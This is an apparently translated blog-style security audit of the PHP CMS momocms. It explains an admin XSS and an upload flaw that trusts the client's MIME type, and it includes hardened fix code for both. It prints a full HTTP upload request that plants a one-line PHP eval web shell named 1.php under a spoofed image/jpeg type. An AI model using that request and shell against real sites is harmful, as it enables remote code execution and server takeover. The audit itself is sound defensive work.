While I was bored I came across a popular program on Webmaster Home, so I downloaded it and had a look.
On the front end, $_GET parameters are filtered through intval(), so there is nothing to exploit there.
There is an XSS in the admin backend, at line 96 of admincreate_sub_product.php:
    <input type="hidden" name="category" value="<?php echo $_GET['id']; ?>">
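The id is echoed straight into an attribute without validation or encoding. As an added example (not momocms code), here is a hardened form of that line: it accepts only an integer id, which is an assumption about how category ids are stored, and HTML-encodes the value for the attribute context. The function names are my own.

```php
<?php
// Added example, not momocms code: hardened version of the hidden input
// at admincreate_sub_product.php line 96, which echoes $_GET['id'] raw.

/**
 * Return the category id as an integer, or null if it is not a plain
 * non-negative number. Assumption: category ids are integer keys.
 */
function category_id_from_request(array $get): ?int
{
    if (!isset($get['id']) || !preg_match('/^\d+$/', (string) $get['id'])) {
        return null;
    }
    return (int) $get['id'];
}

/** Render the hidden input with the value encoded for an HTML attribute. */
function hidden_category_input(?int $id): string
{
    $value = $id === null ? '' : (string) $id;
    return '<input type="hidden" name="category" value="'
        . htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '">';
}

// Constructed request inputs for demonstration: a normal id and one that
// tries to break out of the attribute.
$benign  = ['id' => '42'];
$hostile = ['id' => '42"><b>x</b>'];

echo hidden_category_input(category_id_from_request($benign)), "\n";
echo hidden_category_input(category_id_from_request($hostile)), "\n";
```

With the benign input the rendered attribute contains the number as before; with the hostile input the validation step rejects the id, so the attribute is emitted empty, and even if validation were relaxed the htmlspecialchars() call would encode the quote and angle brackets rather than let them close the attribute.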
Second: Upload vulnerability
The code in admin/banner_do.php is as follows:
    require("./database.php");
    if(empty($_SESSION['momocms_admin'])){
        header("Location:./index.php");
        exit;
    }
    if($_SESSION['momocms_isAdmin']==1){
        // Only the client-supplied MIME type is checked, never the file extension
        if (($_FILES["banner"]["type"] == "image/gif")
            || ($_FILES["banner"]["type"] == "image/jpeg")
            || ($_FILES["banner"]["type"] == "image/png")
            || ($_FILES["banner"]["type"] == "image/pjpeg")) {
            if ($_FILES["banner"]["error"] > 0){
                echo "Return Code: " . $_FILES["banner"]["error"] . "<br />";
            }else{
                if(!is_dir("../resource/slide/images")){
                    mkdir("../resource/slide/images");
                }
                // The original suffix (everything after the last dot) is kept as-is
                $pos = strrpos($_FILES["banner"]["name"],".");
                $back = substr($_FILES["banner"]["name"],$pos);
                $_FILES["banner"]["name"] = time().$back;
                move_uploaded_file($_FILES["banner"]["tmp_name"], "../resource/slide/images/". $_FILES["banner"]["name"]);
                $pic="../resource/slide/images/". $_FILES["banner"]["name"];
                echo '<script>
                    parent.document.getElementById("successMsg").style.display="block";
                    setTimeout(function(){ parent.window.location.href="./banner.php"; },1500);
                </script>';
            }
        }
    }
You can see that the upload handler only checks the client-supplied MIME type ($_FILES["banner"]["type"]) and never checks the file suffix or the actual contents.
So a request that sets Content-Type: image/jpeg gets through the upload check:
    POST /test/momocms/admin/banner_do.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/test/momocms/admin/banner.php
    Cookie: PHPSESSID=a920be64bc19dc2b620e7ddab2441811
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------13761195204349
    Content-Length: 227

    -----------------------------13761195204349
    Content-Disposition: form-data; name="banner"; filename="1.php"
    Content-Type: image/jpeg

    <?php eval($_POST['w']);?>
    -----------------------------13761195204349--
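The root cause is that both the MIME type and the filename suffix come from the client. As an added example (not momocms code), here is a hardened replacement for the banner upload logic that sniffs the real content type with finfo, checks that the file decodes as an image, and names the stored file itself from an extension allowlist. It assumes the original session checks still run before it, that the 2 MiB size cap is acceptable, and that the upload directory is configured so the web server does not execute scripts from it; the function and constant names are my own.

```php
<?php
// Added example, not momocms code: hardened banner upload for admin/banner_do.php.
// Assumptions: the session checks from the original precede this code, and
// $uploadDir is an existing directory from which the server will not execute PHP.

const ALLOWED_BANNERS = [
    'image/gif'  => 'gif',
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Validate an uploaded banner and return its stored path, or throw.
 * Neither $file['type'] nor $file['name'] from the client is trusted: the MIME
 * type is sniffed from the bytes and the extension comes from the allowlist.
 */
function store_banner(array $file, string $uploadDir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . ($file['error'] ?? 'unknown'));
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > 2 * 1024 * 1024) {   // 2 MiB cap (assumed limit)
        throw new RuntimeException('file too large');
    }

    // Sniff the real content type instead of trusting the Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_BANNERS[$mime])) {
        throw new RuntimeException('unsupported image type: ' . $mime);
    }
    // Require that the file actually parses as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file is not a decodable image');
    }

    // Choose the stored name ourselves: random, with the allowlisted extension,
    // instead of time() plus whatever suffix the client sent.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_BANNERS[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move uploaded file');
    }
    chmod($dest, 0644);   // no execute bit, readable by the web server
    return $dest;
}

// Usage inside the handler, after the original session checks:
try {
    $pic = store_banner($_FILES['banner'], '../resource/slide/images');
    echo 'stored ' . htmlspecialchars($pic, ENT_QUOTES, 'UTF-8');
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'Upload rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```

Against the request shown above, finfo reports text/x-php (or text/plain) for the body rather than image/jpeg, so the upload is rejected before move_uploaded_file() runs; and even a genuine image file is stored under a random name with a .jpg/.png/.gif extension, so the client's filename never influences the path.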
There is also a place in the backend widget section where the PHP source code can be edited directly.
That is as far as I have looked for now; there are other parts to look at later.
The above is an introduction to the momocms code audit; I hope it is helpful to readers interested in PHP.